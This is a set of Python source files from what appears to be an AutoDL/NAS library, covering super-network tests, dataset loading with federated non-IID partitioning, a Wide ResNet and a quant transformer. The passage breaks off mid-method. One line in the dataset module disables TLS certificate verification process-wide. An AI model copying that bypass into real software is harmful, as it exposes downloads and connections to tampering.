class TestSuperSimpleNorm(unittest.TestCase):
"""Test the super simple norm."""
def test_super_simple_norm(self):
out_features = spaces.Categorical(12, 24, 36)
bias = spaces.Categorical(True, False)
model = super_core.SuperSequential(
super_core.SuperSimpleNorm(5, 0.5),
super_core.SuperLinear(10, out_features, bias=bias),
)
print("The simple super module is:\n{:}".format(model))
model.apply_verbose(True)
print(model.super_run_type)
self.assertTrue(model[1].bias)
inputs = torch.rand(20, 10)
print("Input shape: {:}".format(inputs.shape))
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), (20, 36))
abstract_space = model.abstract_search_space
abstract_space.clean_last()
abstract_child = abstract_space.random()
print("The abstract searc space:\n{:}".format(abstract_space))
print("The abstract child program:\n{:}".format(abstract_child))
model.set_super_run_type(super_core.SuperRunMode.Candidate)
model.enable_candidate()
model.apply_candidate(abstract_child)
output_shape = (20, abstract_child["1"]["_out_features"].value)
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), output_shape)
def test_super_simple_learn_norm(self):
out_features = spaces.Categorical(12, 24, 36)
bias = spaces.Categorical(True, False)
model = super_core.SuperSequential(
super_core.SuperSimpleLearnableNorm(),
super_core.SuperIdentity(),
super_core.SuperLinear(10, out_features, bias=bias),
)
print("The simple super module is:\n{:}".format(model))
model.apply_verbose(True)
print(model.super_run_type)
self.assertTrue(model[2].bias)
inputs = torch.rand(20, 10)
print("Input shape: {:}".format(inputs.shape))
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), (20, 36))
abstract_space = model.abstract_search_space
abstract_space.clean_last()
abstract_child = abstract_space.random()
print("The abstract searc space:\n{:}".format(abstract_space))
print("The abstract child program:\n{:}".format(abstract_child))
model.set_super_run_type(super_core.SuperRunMode.Candidate)
model.enable_candidate()
model.apply_candidate(abstract_child)
output_shape = (20, abstract_child["2"]["_out_features"].value)
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), output_shape)
```
#### File: xautodl/config_utils/share_args.py
```python
import os, sys, time, random, argparse
def add_shared_args(parser):
# Data Generation
parser.add_argument("--dataset", type=str, help="The dataset name.")
parser.add_argument("--data_path", type=str, help="The dataset name.")
parser.add_argument(
"--cutout_length", type=int, help="The cutout length, negative means not use."
)
# Printing
parser.add_argument(
"--print_freq", type=int, default=100, help="print frequency (default: 200)"
)
parser.add_argument(
"--print_freq_eval",
type=int,
default=100,
help="print frequency (default: 200)",
)
# Checkpoints
parser.add_argument(
"--eval_frequency",
type=int,
default=1,
help="evaluation frequency (default: 200)",
)
parser.add_argument(
"--save_dir", type=str, help="Folder to save checkpoints and log."
)
# Acceleration
parser.add_argument(
"--workers",
type=int,
default=8,
help="number of data loading workers (default: 8)",
)
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
```
#### File: xautodl/datasets/get_dataset_with_transform.py
```python
import os, sys, torch
import os.path as osp
import numpy as np
import torchvision.datasets as dset
import torchvision.transforms as transforms
from copy import deepcopy
from PIL import Image
from xautodl.config_utils import load_config
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
from .DownsampledImageNet import ImageNet16
from .SearchDatasetWrap import SearchDataset
from torch.utils.data import DataLoader, Dataset
import random
import json
import pandas as pd
Dataset2Class = {
"cifar10": 10,
"cifar100": 100,
"imagenet-1k-s": 1000,
"imagenet-1k": 1000,
"ImageNet16": 1000,
"ImageNet16-150": 150,
"ImageNet16-120": 120,
"ImageNet16-200": 200,
"mini-imagenet":100
}
class MyDataSet(Dataset):
"""自定义数据集"""
def __init__(self,
root_dir: str,
csv_name: str,
json_path: str,
transform=None):
images_dir = os.path.join(root_dir, "images")
assert os.path.exists(images_dir), "dir:'{}' not found.".format(images_dir)
assert os.path.exists(json_path), "file:'{}' not found.".format(json_path)
self.label_dict = json.load(open(json_path, "r"))
csv_path = os.path.join(root_dir, csv_name)
assert os.path.exists(csv_path), "file:'{}' not found.".format(csv_path)
csv_data = pd.read_csv(csv_path)
self.total_num = csv_data.shape[0]
self.img_paths = [os.path.join(images_dir, i) for i in csv_data["filename"].values]
self.img_label = [self.label_dict[i][0] for i in csv_data["label"].values]
self.labels = set(csv_data["label"].values)
self.transform = transform
def __len__(self):
return self.total_num
def __getitem__(self, item):
img = Image.open(self.img_paths[item])
        # 'RGB' means a color image; 'L' means a grayscale image
if img.mode != 'RGB':
raise ValueError("image: {} isn't RGB mode.".format(self.img_paths[item]))
label = self.img_label[item]
if self.transform is not None:
img = self.transform(img)
return img, label
@staticmethod
def collate_fn(batch):
images, labels = tuple(zip(*batch))
images = torch.stack(images, dim=0)
labels = torch.as_tensor(labels)
return images, labels
class DatasetSplit(Dataset):
"""An abstract Dataset class wrapped around Pytorch Dataset class.
"""
def __init__(self, dataset, idxs):
self.dataset = dataset
self.idxs = [int(i) for i in idxs]
def __len__(self):
return len(self.idxs)
def __getitem__(self, item):
image, label = self.dataset[self.idxs[item]]
return torch.tensor(image), torch.tensor(label)
def randomSplit(M, N, minV, maxV):
res = []
while N > 0:
l = max(minV, M - (N-1)*maxV)
r = min(maxV, M - (N-1)*minV)
num = random.randint(l, r)
N -= 1
M -= num
res.append(num)
print(res)
return res
def uniform(N, k):
"""Uniform distribution of 'N' items into 'k' groups."""
dist = []
avg = N / k
# Make distribution
for i in range(k):
dist.append(int((i + 1) * avg) - int(i * avg))
# Return shuffled distribution
random.shuffle(dist)
return dist
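# Added note: uniform() splits N items into k near-equal groups via cumulative rounding,
# e.g. uniform(10, 3) builds [3, 3, 4] before shuffling, and the group sizes always sum to N.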
def normal(N, k):
"""Normal distribution of 'N' items into 'k' groups."""
dist = []
# Make distribution
for i in range(k):
x = i - (k - 1) / 2
dist.append(int(N * (np.exp(-x) / (np.exp(-x) + 1)**2)))
# Add remainders
remainder = N - sum(dist)
dist = list(np.add(dist, uniform(remainder, k)))
# Return non-shuffled distribution
return dist
def data_organize(idxs_labels, labels):
data_dict = {}
labels = np.unique(labels, axis=0)
for one in labels:
data_dict[one] = []
for i in range(len(idxs_labels[1, :])):
data_dict[idxs_labels[1, i]].append(idxs_labels[0, i])
return data_dict
def data_partition(training_data, testing_data, alpha, user_num):
idxs_train = np.arange(len(training_data))
idxs_valid = np.arange(len(testing_data))
if hasattr(training_data, 'targets'):
labels_train = training_data.targets
labels_valid = testing_data.targets
elif hasattr(training_data, 'img_label'):
labels_train = training_data.img_label
labels_valid = testing_data.img_label
idxs_labels_train = np.vstack((idxs_train, labels_train))
idxs_labels_train = idxs_labels_train[:, idxs_labels_train[1,:].argsort()]
idxs_labels_valid = np.vstack((idxs_valid, labels_valid))
idxs_labels_valid = idxs_labels_valid[:, idxs_labels_valid[1,:].argsort()]
labels = np.unique(labels_train, axis=0)
data_train_dict = data_organize(idxs_labels_train, labels)
data_valid_dict = data_organize(idxs_labels_valid, labels)
data_partition_profile_train = {}
data_partition_profile_valid = {}
for i in range(user_num):
data_partition_profile_train[i] = []
data_partition_profile_valid[i] = []
## Setting the public data
public_data = set([])
for label in data_train_dict:
tep = set(np.random.choice(data_train_dict[label], int(len(data_train_dict[label])/20), replace = False))
public_data = set.union(public_data, tep)
data_train_dict[label] = list(set(data_train_dict[label])-tep)
public_data = list(public_data)
np.random.shuffle(public_data)
## Distribute rest data
for label in data_train_dict:
proportions = np.random.dirichlet(np.repeat(alpha, user_num))
proportions_train = len(data_train_dict[label])*proportions
proportions_valid = len(data_valid_dict[label]) * proportions
for user in data_partition_profile_train:
data_partition_profile_train[user] \
= set.union(set(np.random.choice(data_train_dict[label], int(proportions_train[user]) , replace = False)), data_partition_profile_train[user])
data_train_dict[label] = list(set(data_train_dict[label])-data_partition_profile_train[user])
data_partition_profile_valid[user] = set.union(set(
np.random.choice(data_valid_dict[label], int(proportions_valid[user]),
replace=False)), data_partition_profile_valid[user])
data_valid_dict[label] = list(set(data_valid_dict[label]) - data_partition_profile_valid[user])
while len(data_train_dict[label]) != 0:
rest_data = data_train_dict[label][0]
user = np.random.randint(0, user_num)
data_partition_profile_train[user].add(rest_data)
data_train_dict[label].remove(rest_data)
while len(data_valid_dict[label]) != 0:
rest_data = data_valid_dict[label][0]
user = np.random.randint(0, user_num)
data_partition_profile_valid[user].add(rest_data)
data_valid_dict[label].remove(rest_data)
for user in data_partition_profile_train:
data_partition_profile_train[user] = list(data_partition_profile_train[user])
data_partition_profile_valid[user] = list(data_partition_profile_valid[user])
np.random.shuffle(data_partition_profile_train[user])
np.random.shuffle(data_partition_profile_valid[user])
return data_partition_profile_train, data_partition_profile_valid, public_data
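# Added note: data_partition reserves roughly 5% of each class as shared "public data",
# then splits the remaining train/valid samples of every class across user_num users with
# a per-class Dirichlet(alpha) draw, so smaller alpha gives a more non-IID partition;
# leftover samples are handed to random users.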
class CUTOUT(object):
def __init__(self, length):
self.length = length
def __repr__(self):
return "{name}(length={length})".format(
name=self.__class__.__name__, **self.__dict__
)
def __call__(self, img):
h, w = img.size(1), img.size(2)
mask = np.ones((h, w), np.float32)
y = np.random.randint(h)
x = np.random.randint(w)
y1 = np.clip(y - self.length // 2, 0, h)
y2 = np.clip(y + self.length // 2, 0, h)
x1 = np.clip(x - self.length // 2, 0, w)
x2 = np.clip(x + self.length // 2, 0, w)
mask[y1:y2, x1:x2] = 0.0
mask = torch.from_numpy(mask)
mask = mask.expand_as(img)
img *= mask
return img
imagenet_pca = {
"eigval": np.asarray([0.2175, 0.0188, 0.0045]),
"eigvec": np.asarray(
[
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
]
),
}
class Lighting(object):
def __init__(
self, alphastd, eigval=imagenet_pca["eigval"], eigvec=imagenet_pca["eigvec"]
):
self.alphastd = alphastd
assert eigval.shape == (3,)
assert eigvec.shape == (3, 3)
self.eigval = eigval
self.eigvec = eigvec
def __call__(self, img):
if self.alphastd == 0.0:
return img
rnd = np.random.randn(3) * self.alphastd
rnd = rnd.astype("float32")
v = rnd
old_dtype = np.asarray(img).dtype
v = v * self.eigval
v = v.reshape((3, 1))
inc = np.dot(self.eigvec, v).reshape((3,))
img = np.add(img, inc)
if old_dtype == np.uint8:
img = np.clip(img, 0, 255)
img = Image.fromarray(img.astype(old_dtype), "RGB")
return img
def __repr__(self):
return self.__class__.__name__ + "()"
def get_datasets(name, root, cutout):
if name == "cifar10":
mean = [x / 255 for x in [125.3, 123.0, 113.9]]
std = [x / 255 for x in [63.0, 62.1, 66.7]]
elif name == "cifar100":
mean = [x / 255 for x in [129.3, 124.1, 112.4]]
std = [x / 255 for x in [68.2, 65.4, 70.4]]
elif name.startswith("imagenet-1k"):
mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
elif name.startswith("ImageNet16"):
mean = [x / 255 for x in [122.68, 116.66, 104.01]]
std = [x / 255 for x in [63.22, 61.26, 65.09]]
elif name.startswith("mini-imagenet"):
mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
else:
        raise TypeError("Unknown dataset : {:}".format(name))
    # Data Augmentation
if name == "cifar10" or name == "cifar100":
lists = [
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
if cutout > 0:
lists += [CUTOUT(cutout)]
train_transform = transforms.Compose(lists)
test_transform = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize(mean, std)]
)
xshape = (1, 3, 32, 32)
elif name.startswith("ImageNet16"):
lists = [
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(16, padding=2),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
if cutout > 0:
lists += [CUTOUT(cutout)]
train_transform = transforms.Compose(lists)
test_transform = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize(mean, std)]
)
xshape = (1, 3, 16, 16)
elif name == "tiered":
lists = [
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(80, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
if cutout > 0:
lists += [CUTOUT(cutout)]
train_transform = transforms.Compose(lists)
test_transform = transforms.Compose(
[
transforms.CenterCrop(80),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
)
xshape = (1, 3, 32, 32)
elif name.startswith("imagenet-1k"):
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
if name == "imagenet-1k":
xlists = [transforms.RandomResizedCrop(224)]
xlists.append(
transforms.ColorJitter(
brightness=0.4, contrast=0.4, saturation=0.4, hue=0.2
)
)
xlists.append(Lighting(0.1))
elif name == "imagenet-1k-s":
xlists = [transforms.RandomResizedCrop(224, scale=(0.2, 1.0))]
else:
raise ValueError("invalid name : {:}".format(name))
xlists.append(transforms.RandomHorizontalFlip(p=0.5))
xlists.append(transforms.ToTensor())
xlists.append(normalize)
train_transform = transforms.Compose(xlists)
test_transform = transforms.Compose(
[
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
]
)
xshape = (1, 3, 224, 224)
elif name == "mini-imagenet":
train_transform = transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
test_transform = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
xshape = (1, 3, 224, 224)
else:
        raise TypeError("Unknown dataset : {:}".format(name))
if name == "cifar10":
train_data = dset.CIFAR10(
root, train=True, transform=train_transform, download=True
)
test_data = dset.CIFAR10(
root, train=False, transform=test_transform, download=True
)
assert len(train_data) == 50000 and len(test_data) == 10000
elif name == "cifar100":
train_data = dset.CIFAR100(
root, train=True, transform=train_transform, download=True
)
test_data = dset.CIFAR100(
root, train=False, transform=test_transform, download=True
)
assert len(train_data) == 50000 and len(test_data) == 10000
elif name.startswith("imagenet-1k"):
train_data = dset.ImageFolder(osp.join(root, "train"), train_transform)
test_data = dset.ImageFolder(osp.join(root, "val"), test_transform)
assert (
len(train_data) == 1281167 and len(test_data) == 50000
), "invalid number of images : {:} & {:} vs {:} & {:}".format(
len(train_data), len(test_data), 1281167, 50000
)
elif name == "ImageNet16":
train_data = ImageNet16(root, True, train_transform)
test_data = ImageNet16(root, False, test_transform)
assert len(train_data) == 1281167 and len(test_data) == 50000
elif name == "ImageNet16-120":
train_data = ImageNet16(root, True, train_transform, 120)
test_data = ImageNet16(root, False, test_transform, 120)
assert len(train_data) == 151700 and len(test_data) == 6000
elif name == "ImageNet16-150":
train_data = ImageNet16(root, True, train_transform, 150)
test_data = ImageNet16(root, False, test_transform, 150)
assert len(train_data) == 190272 and len(test_data) == 7500
elif name == "ImageNet16-200":
train_data = ImageNet16(root, True, train_transform, 200)
test_data = ImageNet16(root, False, test_transform, 200)
assert len(train_data) == 254775 and len(test_data) == 10000
elif name == "mini-imagenet":
print("Preparing Mini-ImageNet dataset")
json_path = "./classes_name.json"
data_root = "./mini-imagenet/"
train_data = MyDataSet(root_dir=data_root,
csv_name="new_train.csv",
json_path=json_path,
transform=train_transform)
test_data = MyDataSet(root_dir=data_root,
csv_name="new_test.csv",
json_path=json_path,
transform=test_transform)
else:
        raise TypeError("Unknown dataset : {:}".format(name))
class_num = Dataset2Class[name]
return train_data, test_data, xshape, class_num
def get_nas_search_loaders(
train_data, valid_data, dataset, config_root, batch_size, workers
):
valid_use = False
if isinstance(batch_size, (list, tuple)):
batch, test_batch = batch_size
else:
batch, test_batch = batch_size, batch_size
if dataset == "cifar10" or dataset == 'cifar100' or dataset == 'mini-imagenet':
xvalid_data = deepcopy(train_data)
alpha = 0.5
# random.seed(61)
# np.random.seed(61)
# user_data = {}
# tep_train, tep_valid, tep_public = data_partition(train_data, valid_data, alpha, 5)
#
# for one in tep_train:
# if valid_use:
# # a = np.random.choice(tep[one], int(len(tep[one])/2), replace=False)
# user_data[one] = {'train': tep_train[one], 'test': tep_valid[one]}
# else:
# a = np.random.choice(tep_train[one], int(len(tep_train[one]) / 2), replace=False)
# user_data[one] = {'train': list(set(a)), 'test': list(set(tep_train[one]) - set(a)),
# 'valid': tep_valid[one]}
#
#
# user_data["public"] = tep_public
# np.save('Dirichlet_{}_Use_valid_{}_{}_non_iid_setting.npy'.format(alpha, valid_use, dataset), user_data)
user_data = np.load('Dirichlet_{}_Use_valid_{}_{}_non_iid_setting.npy'.format(alpha, valid_use, dataset),
allow_pickle=True).item()
if hasattr(xvalid_data, "transforms"): # to avoid a print issue
xvalid_data.transforms = valid_data.transform
xvalid_data.transform = deepcopy(valid_data.transform)
search_loader = {}
valid_loader = {}
train_loader = {}
for one in user_data:
if isinstance(one, int):
if valid_use:
search_data = SearchDataset(dataset, [train_data, valid_data], user_data[one]['train'],
user_data[one]['test'])
valid_loader[one] = torch.utils.data.DataLoader(
xvalid_data,
batch_size=test_batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(user_data[one]['test']),
num_workers=workers,
pin_memory=True,
)
else:
search_data = SearchDataset(dataset, train_data, user_data[one]['train'], user_data[one]['test'])
valid_loader[one] = torch.utils.data.DataLoader(
xvalid_data,
batch_size=test_batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(user_data[one]['valid']),
num_workers=workers,
pin_memory=True,
)
# data loader
search_loader[one] = torch.utils.data.DataLoader(
search_data,
batch_size=batch,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
train_loader[one] = torch.utils.data.DataLoader(
train_data,
batch_size=batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(user_data[one]['train']),
num_workers=workers,
pin_memory=True,
)
elif dataset == "ImageNet16-120":
imagenet_test_split = load_config(
"{:}/imagenet-16-120-test-split.txt".format(config_root), None, None
)
search_train_data = train_data
search_valid_data = deepcopy(valid_data)
search_valid_data.transform = train_data.transform
search_data = SearchDataset(
dataset,
[search_train_data, search_valid_data],
list(range(len(search_train_data))),
imagenet_test_split.xvalid,
)
search_loader = torch.utils.data.DataLoader(
search_data,
batch_size=batch,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=batch,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=test_batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
imagenet_test_split.xvalid
),
num_workers=workers,
pin_memory=True,
)
else:
raise ValueError("invalid dataset : {:}".format(dataset))
return search_loader, train_loader, valid_loader
if __name__ == '__main__':
np.random.seed(61)
train_data, test_data, xshape, class_num = get_datasets('cifar10', '/data02/dongxuanyi/.torch/cifar.python/', -1)
data_partition(train_data, test_data, 0.5, 5)
```
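A minimal usage sketch (not part of the original file; the tensor shape and `length` value are made up for illustration): apply the `CUTOUT` class defined in the file above to a CIFAR-sized image tensor, the same way `get_datasets` appends it to the transform list when `cutout > 0`.
```python
import torch

cut = CUTOUT(length=16)        # CUTOUT is defined in the file above
img = torch.rand(3, 32, 32)    # fake CIFAR-sized image tensor (C, H, W)
out = cut(img)                 # zeroes one random square of up to 16x16 pixels, in place
print(out.shape)               # torch.Size([3, 32, 32])
```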
#### File: xautodl/models/CifarWideResNet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from .initialization import initialize_resnet
class WideBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride, dropout=False):
super(WideBasicblock, self).__init__()
self.bn_a = nn.BatchNorm2d(inplanes)
self.conv_a = nn.Conv2d(
inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False
)
self.bn_b = nn.BatchNorm2d(planes)
if dropout:
self.dropout = nn.Dropout2d(p=0.5, inplace=True)
else:
self.dropout = None
self.conv_b = nn.Conv2d(
planes, planes, kernel_size=3, stride=1, padding=1, bias=False
)
if inplanes != planes:
self.downsample = nn.Conv2d(
inplanes, planes, kernel_size=1, stride=stride, padding=0, bias=False
)
else:
self.downsample = None
def forward(self, x):
basicblock = self.bn_a(x)
basicblock = F.relu(basicblock)
basicblock = self.conv_a(basicblock)
basicblock = self.bn_b(basicblock)
basicblock = F.relu(basicblock)
if self.dropout is not None:
basicblock = self.dropout(basicblock)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
x = self.downsample(x)
return x + basicblock
class CifarWideResNet(nn.Module):
"""
    Wide ResNet for the CIFAR datasets, as described in
    https://arxiv.org/abs/1605.07146
"""
def __init__(self, depth, widen_factor, num_classes, dropout):
super(CifarWideResNet, self).__init__()
# Model type specifies number of layers for CIFAR-10 and CIFAR-100 model
        assert (depth - 4) % 6 == 0, "depth should be of the form 6n+4 (e.g., 16, 22, 28, 40)"
layer_blocks = (depth - 4) // 6
print(
"CifarPreResNet : Depth : {} , Layers for each block : {}".format(
depth, layer_blocks
)
)
self.num_classes = num_classes
self.dropout = dropout
self.conv_3x3 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False)
self.message = "Wide ResNet : depth={:}, widen_factor={:}, class={:}".format(
depth, widen_factor, num_classes
)
self.inplanes = 16
self.stage_1 = self._make_layer(
WideBasicblock, 16 * widen_factor, layer_blocks, 1
)
self.stage_2 = self._make_layer(
WideBasicblock, 32 * widen_factor, layer_blocks, 2
)
self.stage_3 = self._make_layer(
WideBasicblock, 64 * widen_factor, layer_blocks, 2
)
self.lastact = nn.Sequential(
nn.BatchNorm2d(64 * widen_factor), nn.ReLU(inplace=True)
)
self.avgpool = nn.AvgPool2d(8)
self.classifier = nn.Linear(64 * widen_factor, num_classes)
self.apply(initialize_resnet)
def get_message(self):
return self.message
def _make_layer(self, block, planes, blocks, stride):
layers = []
layers.append(block(self.inplanes, planes, stride, self.dropout))
self.inplanes = planes
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, self.dropout))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv_3x3(x)
x = self.stage_1(x)
x = self.stage_2(x)
x = self.stage_3(x)
x = self.lastact(x)
x = self.avgpool(x)
features = x.view(x.size(0), -1)
outs = self.classifier(features)
return features, outs
```
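A minimal usage sketch (not part of the original file; the depth and widen_factor values are chosen for illustration): build a WRN-28-10 for CIFAR-10 and run a dummy forward pass. Note that `forward` returns a `(features, logits)` tuple.
```python
import torch

net = CifarWideResNet(depth=28, widen_factor=10, num_classes=10, dropout=False)
x = torch.randn(2, 3, 32, 32)
features, logits = net(x)
print(features.shape, logits.shape)  # torch.Size([2, 640]) torch.Size([2, 10])
```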
#### File: xautodl/models/initialization.py
```python
import torch
import torch.nn as nn
def initialize_resnet(m):
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
```
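A minimal usage sketch (not part of the original file; the toy architecture is made up): `initialize_resnet` is meant to be passed to `nn.Module.apply`, which calls it on every submodule.
```python
import torch.nn as nn

model = nn.Sequential(
    nn.Conv2d(3, 16, kernel_size=3, padding=1, bias=False),
    nn.BatchNorm2d(16),
    nn.ReLU(inplace=True),
    nn.Flatten(),
    nn.Linear(16 * 32 * 32, 10),
)
model.apply(initialize_resnet)  # Kaiming init for conv, constants for BN, small normal for linear
```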
#### File: models/shape_infers/shared_utils.py
```python
def parse_channel_info(xstring):
blocks = xstring.split(" ")
blocks = [x.split("-") for x in blocks]
blocks = [[int(_) for _ in x] for x in blocks]
return blocks
```
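A quick illustration (not part of the original file): the function parses a space-separated string of dash-joined integers into a nested list of ints, e.g. for per-block channel configurations.
```python
print(parse_channel_info("3-16 16-32 32-64"))
# [[3, 16], [16, 32], [32, 64]]
```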
#### File: xautodl/procedures/advanced_main.py
```python
import os, sys, time, torch
from typing import Optional, Text, Callable
# modules in AutoDL
from xautodl.log_utils import AverageMeter, time_string
from .eval_funcs import obtain_accuracy
def get_device(tensors):
if isinstance(tensors, (list, tuple)):
return get_device(tensors[0])
elif isinstance(tensors, dict):
for key, value in tensors.items():
return get_device(value)
else:
return tensors.device
def basic_train_fn(
xloader,
network,
criterion,
optimizer,
metric,
logger,
):
results = procedure(
xloader,
network,
criterion,
optimizer,
metric,
"train",
logger,
)
return results
def basic_eval_fn(xloader, network, metric, logger):
with torch.no_grad():
results = procedure(
xloader,
network,
None,
None,
metric,
"valid",
logger,
)
return results
def procedure(
xloader,
network,
criterion,
optimizer,
metric,
mode: Text,
logger_fn: Callable = None,
):
data_time, batch_time = AverageMeter(), AverageMeter()
if mode.lower() == "train":
network.train()
elif mode.lower() == "valid":
network.eval()
else:
raise ValueError("The mode is not right : {:}".format(mode))
end = time.time()
for i, (inputs, targets) in enumerate(xloader):
# measure data loading time
data_time.update(time.time() - end)
# calculate prediction and loss
if mode == "train":
optimizer.zero_grad()
outputs = network(inputs)
targets = targets.to(get_device(outputs))
if mode == "train":
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
# record
with torch.no_grad():
results = metric(outputs, targets)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
return metric.get_info()
```
#### File: xautodl/spaces/basic_op.py
```python
from .basic_space import Space
from .basic_space import VirtualNode
from .basic_space import Integer
from .basic_space import Continuous
from .basic_space import Categorical
from .basic_space import _EPS
def has_categorical(space_or_value, x):
if isinstance(space_or_value, Space):
return space_or_value.has(x)
else:
return space_or_value == x
def has_continuous(space_or_value, x):
if isinstance(space_or_value, Space):
return space_or_value.has(x)
else:
return abs(space_or_value - x) <= _EPS
def is_determined(space_or_value):
if isinstance(space_or_value, Space):
return space_or_value.determined
else:
return True
def get_determined_value(space_or_value):
if not is_determined(space_or_value):
raise ValueError("This input is not determined: {:}".format(space_or_value))
if isinstance(space_or_value, Space):
if isinstance(space_or_value, Continuous):
return space_or_value.lower
elif isinstance(space_or_value, Categorical):
return get_determined_value(space_or_value[0])
else: # VirtualNode
return space_or_value.value
else:
return space_or_value
def get_max(space_or_value):
if isinstance(space_or_value, Integer):
return max(space_or_value.candidates)
elif isinstance(space_or_value, Continuous):
return space_or_value.upper
elif isinstance(space_or_value, Categorical):
values = []
for index in range(len(space_or_value)):
max_value = get_max(space_or_value[index])
values.append(max_value)
return max(values)
else:
return space_or_value
def get_min(space_or_value):
if isinstance(space_or_value, Integer):
return min(space_or_value.candidates)
elif isinstance(space_or_value, Continuous):
return space_or_value.lower
elif isinstance(space_or_value, Categorical):
values = []
for index in range(len(space_or_value)):
min_value = get_min(space_or_value[index])
values.append(min_value)
return min(values)
else:
return space_or_value
```
#### File: xautodl/trade_models/quant_transformer.py
```python
from __future__ import division
from __future__ import print_function
import os, math, random
from collections import OrderedDict
import numpy as np
import pandas as pd
from typing import Text, Union
import copy
from functools import partial
from typing import Optional, Text
from qlib.utils import get_or_create_path
from qlib.log import get_module_logger
import torch
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as th_data
from xautodl.xmisc import AverageMeter
from xautodl.xmisc import count_parameters
from xautodl.xlayers import super_core
from .transformers import DEFAULT_NET_CONFIG
from .transformers import get_transformer
from qlib.model.base import Model
from qlib.data.dataset import DatasetH
from qlib.data.dataset.handler import DataHandlerLP
DEFAULT_OPT_CONFIG = dict(
epochs=200,
lr=0.001,
batch_size=2000,
early_stop=20,
loss="mse",
optimizer="adam",
num_workers=4,
)
def train_or_test_epoch(
xloader, model, loss_fn, metric_fn, is_train, optimizer, device
):
if is_train:
model.train()
else:
model.eval()
score_meter, loss_meter = AverageMeter(), AverageMeter()
for ibatch, (feats, labels) in enumerate(xloader):
feats, labels = feats.to(device), labels.to(device)
# forward the network
preds = model(feats)
loss = loss_fn(preds, labels)
with torch.no_grad():
score = metric_fn(preds, labels)
loss_meter.update(loss.item(), feats.size(0))
score_meter.update(score.item(), feats.size(0))
# optimize the network
if is_train and optimizer is not None:
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_value_(model.parameters(), 3.0)
optimizer.step()
return loss_meter.avg, score_meter.avg
class QuantTransformer(Model):
"""Transformer-based Quant Model"""
def __init__(
self, net_config=None, opt_config=None, metric="", GPU=0, seed=None, **kwargs
):
# Set logger.
self.logger = get_module_logger("QuantTransformer")
self.logger.info("QuantTransformer PyTorch version...")
# set hyper-parameters.
self.net_config = net_config or DEFAULT_NET_CONFIG
self.opt_config = opt_config or DEFAULT_OPT_CONFIG
self.metric = metric
self.device = torch.device(
"cuda:{:}".format(GPU) if torch.cuda.is_available() and GPU >= 0 else "cpu"
)
self.seed = seed
self.logger.info(
"Transformer parameters setting:"
"\nnet_config : {:}"
"\nopt_config : {:}"
"\nmetric : {:}"
"\ndevice : {:}"
"\nseed : {:}".format(
self.net_config,
self.opt_config,
self.metric,
self.device,
self.seed,
)
)
if self.seed is not None:
random.seed(self.seed)
np.random.seed(self.seed)
torch.manual_seed(self.seed)
if self.use_gpu:
torch.cuda.manual_seed(self.seed)
torch.cuda.manual_seed_all(self.seed)
self.model = get_transformer(self.net_config)
self.model.set_super_run_type(super_core.SuperRunMode.FullModel)
self.logger.info("model: {:}".format(self.model))
self.logger.info("model size: {:.3f} MB".format(count_parameters(self.model)))
if self.opt_config["optimizer"] == "adam":
self.train_optimizer = optim.Adam(
self.model.parameters(), lr=self.opt_config["lr"]
)
        elif self.opt_config["optimizer"] == "sgd":
self.train_optimizer = optim.SGD(
self.model.parameters(), lr=self.opt_config["lr"]
)
else:
            raise NotImplementedError(
                "optimizer {:} is not supported!".format(self.opt_config["optimizer"])
            )
self.fitted = False
self.model.to(self.device)
@property
def use_gpu(self):
return self.device != torch.device("cpu")
def to(self, device):
if device is None:
device = "cpu"
self.device = device
self.model.to(self.device)
# move the optimizer
for param in self.train_optimizer.state.values():
# Not sure there are any global tensors in the state dict
if isinstance(param, torch.Tensor):
